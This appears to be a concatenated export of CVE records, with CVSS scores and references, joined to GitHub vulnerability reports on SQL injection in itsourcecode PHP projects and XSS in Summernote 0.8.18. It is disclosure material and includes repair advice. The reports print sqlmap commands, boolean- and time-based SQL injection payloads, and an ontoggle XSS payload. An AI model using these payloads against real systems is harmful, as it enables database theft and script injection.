+ A SQL injection vulnerability was found in the 'print_payroll.php' file of the 'Payroll Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="632" alt="1" src="https://github.com/guiyxli/cve/assets/98604922/2a36f33c-cd8e-4690-a995-b6af5d222173">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Payroll Management System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
+ boolean-based blind
+ error-based
+ UNION query
## Vulnerability location:
+ 'id' parameter
## Payload:
<img width="966" alt="2" src="https://github.com/guiyxli/cve/assets/98604922/43f23f5b-7b3c-4521-bf62-4ca0e4f9e277">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.210.199:1214/print_payroll.php?id=10" --batch --dbs
```
<img width="615" alt="3" src="https://github.com/guiyxli/cve/assets/98604922/235d3ade-a7e4-4198-ab0b-3ccbc2b5fd1e">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Payroll Management System Project In PHP With Source Code v1.0 print_payroll.php SQL injection | https://api.github.com/repos/guiyxli/cve/issues/1/comments | 0 | 2024-06-12T02:46:13Z | 2024-06-12T02:46:13Z | https://github.com/guiyxli/cve/issues/1 | 2,347,680,282 | 1 | 6,063 |
CVE-2024-37629 | 2024-06-12T18:15:12.293 | SummerNote 0.8.18 is vulnerable to Cross Site Scripting (XSS) via the Code View Function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/summernote/summernote/issues/4642"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://grumpz.net/cve-2024-37629-simple-xss-payload-exploits-0day-vulnerability-in-10000-web-apps"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/summernote/summernote/issues/4642"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://grumpz.net/cve-2024-37629-simple-xss-payload-exploits-0day-vulnerability-in-10000-web-apps"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:summernote:summernote:0.8.18:*:*:*:*:*:*:*",
"matchCriteriaId": "D350F186-13E4-441E-9F5A-93A720A12C74",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/summernote/summernote/issues/4642 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"summernote",
"summernote"
] | ### Checklist
- [X] I've looked at the [documentation](https://summernote.org/deep-dive/) to make sure the behavior isn't documented and expected.
- [X] I'm sure this is an issue with Summernote, not with my app or other dependencies (Angular, Cordova, React, etc.).
- [X] I've searched through the [current issues](https://github.com/summernote/summernote/issues) to make sure this hasn't been reported yet.
- [X] My issue is pertinent to this repository of Summernote (jQuery), or I was unable to have my issue resolved from the relevant version I'm using, such as [Angular](https://github.com/summernote/angular-summernote), [dJango](https://github.com/summernote/django-summernote), [Rails](https://github.com/summernote/summernote-rails) or [React](https://github.com/summernote/react-summernote). Please try your issue at the relevent repository first.
- [X] I understand that issues without interaction for more than 14 days (2 weeks), may be closed at our discretion. We do this, as sometimes issues are abandoned. We may at our discretion, add issues to the relevant project to be looked at, or for maintainers to work through as time permits. This is to help keep issues relevant to the current version of Summernote, and to reduce clutter.
- [X] I agree to follow the [Code of Conduct](https://github.com/summernote/summernote/blob/develop/.github/CODE_OF_CONDUCT.md) that this project adheres to.
### Steps to reproduce
For POC purposes, I tested this on the editor running on the main page at https://summernote.org
Navigate to
https://summernote.org
Next click on the **Code View** button, and input the following XSS payload:
`<details/open/ontoggle=prompt(origin)>`

When you click on the **Code View** button, you will see that our XSS payload executes successfully showing DOM access.

### Expected behavior
Most editors will sanitize the user input to avoid allowing the user to execute unintended malicious JavaScript code, such as CKEditor, Tiny MCE, to name a few examples
### Current behavior
We are able to able inject malicious XSS payloads which reach the DOM and are able to execute malicious JavaScript code due to no sanitization on the **Code View** function.
**Note:** There are various users of Summernote who are always vulnerable to systemic persistent XSS issues in the web application due to the summernote editor being used to handle user input formatting. One example being a recently published CVE-2024-34241, more information can be found on my blog post: https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide
### Minimal example reproducing the issue
_No response_
### Environment
- Summernote version: 0.8.18+
- Browser (with version): Firefox and Chrome
- OS/Platform (with version): Ubuntu 22
| XSS Discovered in The Code View Function - Version 0.8.18+ | https://api.github.com/repos/summernote/summernote/issues/4642/comments | 2 | 2024-05-30T06:28:28Z | 2024-10-01T10:05:54Z | https://github.com/summernote/summernote/issues/4642 | 2,324,814,414 | 4,642 | 6,064 |
CVE-2024-37849 | 2024-06-13T14:15:13.300 | A SQL Injection vulnerability in itsourcecode Billing System 1.0 allows a local attacker to execute arbitrary code in process.php via the username parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ganzhi-qcy/cve/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ganzhi-qcy/cve/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:billing_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8E8F33BD-6CFA-4C5D-8E2A-F9E35CE5E818",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ganzhi-qcy/cve/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ganzhi-qcy",
"cve"
] | # Itsourcecode "Billing System " in PHP 1.0 "process.php" SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Billing System In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/billing-system-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ quchunyi,yaomingjun,luowenwei,zhangxin,chenshan,tianbeibei,fengyilin,maqiutong,fuweidong,lishudong at Guangzhou University
## Vulnerable File
+ process.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/02/Billing-System-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'process.php' file of the 'Billing System' project. The reason for this issue is that attackers inject malicious code from the parameter "username" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the PHP "Billing System", "xxxx" discovered a critical SQL injection vulnerability in the "process.php" file. This vulnerability stems from insufficient user input validation of the "username" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
## Vulnerability location:
+ 'username' parameter
## Payload:
--
arameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: username=-6059' OR 7740=7740#&password=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=1' AND (SELECT 5285 FROM (SELECT(SLEEP(5)))mRSC)-- VFjk&password=1
---

## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:



# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode "Billing System " in PHP 1.0 "process.php" SQL injection | https://api.github.com/repos/ganzhi-qcy/cve/issues/3/comments | 0 | 2024-06-07T12:35:49Z | 2024-10-04T07:38:47Z | https://github.com/ganzhi-qcy/cve/issues/3 | 2,340,350,987 | 3 | 6,065 |
CVE-2024-5981 | 2024-06-14T02:15:09.897 | A vulnerability was found in itsourcecode Online House Rental System 1.0. It has been classified as critical. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268458 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LiuYongXiang-git/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.268458"
},
{
"source": "cna@vuldb.com",
"tags": [
"VDB Entry"
],
"url": "https://vuldb.com/?id.268458"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.356163"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LiuYongXiang-git/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.268458"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"VDB Entry"
],
"url": "https://vuldb.com/?id.268458"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.356163"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:angeljudesuarez:online_house_rental_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A276F952-0667-44B9-898A-4F0B94154436",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/LiuYongXiang-git/cve/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"LiuYongXiang-git",
"cve"
] | # Itsourcecode Online House Rental System Project In PHP With Source Code v1.0 manage_user.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online House Rental System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-house-rental-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ dlss
## Vulnerable File
+ manage_user.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Online-House-Rental-Project-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'manage_user.php' file of the 'Online House Rental System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="881" alt="1" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/96859615-a367-46c4-a7c7-ee0e6942e720">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability was discovered in the login function of the " Online-Bookstore-Project-In-PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
## Vulnerability location:
+ 'id' parameter
## Payload:
id=1 AND 7032=7032
<img width="515" alt="2" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/ad1c703c-0acd-4bb8-a1f3-577856105527">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.1.136:1216/manage_user.php?id=1" --batch --dbs
```
<img width="544" alt="3" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/af360e9d-2d58-425e-8689-6601c359a14e">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online House Rental System Project In PHP With Source Code v1.0 manage_user.php SQL injection | https://api.github.com/repos/LiuYongXiang-git/cve/issues/1/comments | 0 | 2024-06-13T10:40:51Z | 2024-06-13T10:40:51Z | https://github.com/LiuYongXiang-git/cve/issues/1 | 2,350,806,578 | 1 | 6,066 |
CVE-2024-5983 | 2024-06-14T02:15:10.173 | A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file bookPerPub.php. The manipulation of the argument pubid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268459. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Mitigation"
],
"url": "https://github.com/LiuYongXiang-git/cve/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268459"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268459"
},
{
"source": "cna@vuldb.com",
"tags": [
"VDB Entry"
],
"url": "https://vuldb.com/?submit.356164"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mitigation"
],
"url": "https://github.com/LiuYongXiang-git/cve/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268459"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268459"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"VDB Entry"
],
"url": "https://vuldb.com/?submit.356164"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_book_store_project:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4AD59DD3-AEC8-4FEB-8580-5501B34821AE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/LiuYongXiang-git/cve/issues/2 | [
"Exploit",
"Mitigation"
] | github.com | [
"LiuYongXiang-git",
"cve"
] | # Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 bookPerPub.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online-Bookstore-Project-In-PHP-Source-Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-book-store-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ dlss
## Vulnerable File
+ bookPerPub.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Online-Bookstore-Project-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'bookPerPub.php' file of the 'Online-Bookstore-Project-In-PHP-Source-Code' project. The reason for this issue is that attackers inject malicious code from the parameter "pubid" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="672" alt="1" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/43f5310e-cecd-4692-9096-cf1f67a5dbc5">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "pubid" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Online-Bookstore-Project-In-PHP-Source-Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
+ boolean-based blind
+ error-based
## Vulnerability location:
+ 'pubid' parameter
## Payload:
<img width="344" alt="2" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/3f08d1d6-d01b-450b-b5b1-8a24b1b9bf97">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u http://192.168.210.199:1213/bookPerPub.php?pubid=1 --batch --dbs
```
<img width="337" alt="3" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/d7d0811b-5f49-428d-a1a4-da9f74e7d295">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 bookPerPub.php SQL injection | https://api.github.com/repos/LiuYongXiang-git/cve/issues/2/comments | 0 | 2024-06-13T10:44:19Z | 2024-06-13T10:50:21Z | https://github.com/LiuYongXiang-git/cve/issues/2 | 2,350,813,076 | 2 | 6,067 |
CVE-2024-5984 | 2024-06-14T02:15:10.443 | A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file book.php. The manipulation of the argument bookisbn leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268460. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
